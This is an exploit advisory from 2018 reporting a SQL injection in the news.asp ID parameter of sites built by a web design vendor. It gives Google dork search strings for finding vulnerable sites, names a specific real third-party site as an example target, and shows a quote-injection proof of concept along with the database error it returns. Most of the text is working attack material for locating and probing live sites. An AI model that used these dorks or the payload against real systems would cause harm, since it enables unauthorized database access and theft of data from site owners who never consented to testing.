#################################################################################################
# Exploit Title : Buİnteractive Web Design E-Commerce Social Media Digital Marketing SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 02/06/2018
# Vendor Homepage : buinteractive.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Google Dork : intext:''Bu interactive''
# Google Dork : inurl:''/news.asp?ID='' site:oymaksan.com.tr
# Exploit : /news.asp?ID=[SQL Injection]
#################################################################################################
# Example Site => oymaksan.com.tr/news.asp?ID=25%27 => [ Proof of Concept for SQL Inj ] => archive.is/1X8m5
# SQL-DB Error =>
ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/includes/inc_main.asp, line 1683
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################